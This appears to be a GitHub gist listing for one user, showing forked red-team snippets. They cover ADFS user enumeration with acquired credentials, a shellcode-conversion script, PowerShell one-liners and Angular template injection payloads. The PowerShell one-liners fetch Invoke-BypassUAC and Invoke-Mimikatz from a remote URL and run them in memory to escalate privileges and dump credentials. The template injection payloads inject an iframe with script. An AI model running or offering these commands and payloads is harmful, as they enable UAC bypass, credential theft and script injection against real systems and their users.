Alexa Souza w4fz5uck5

🚀

https://viperx.io

w4fz5uck5 / ADFS Notes

Created March 19, 2020 16:52 — forked from nullbind/ADFS Notes

ADFS Notes


	Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials.

	Install Apps

	Download and install visual studio 10

	Downoad and install the Lync SDK
	https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated)
	http://go.microsoft.com/fwlink/?LinkID=248583

w4fz5uck5 / ConvertShellcode.py

Created September 3, 2019 15:42 — forked from enigma0x3/ConvertShellcode.py

	import binascii
	import sys

	file_name = sys.argv[1]
	with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
	shellcode += "0x{},".format(i)

w4fz5uck5 / RedTeam_CheatSheet.ps1

Created April 20, 2019 08:03 — forked from jivoi/RedTeam_CheatSheet.ps1

	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands

w4fz5uck5 / AngularTI.md

Created April 18, 2019 17:54 — forked from mccabe615/AngularTI.md

Angular Template Injection Payloads

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';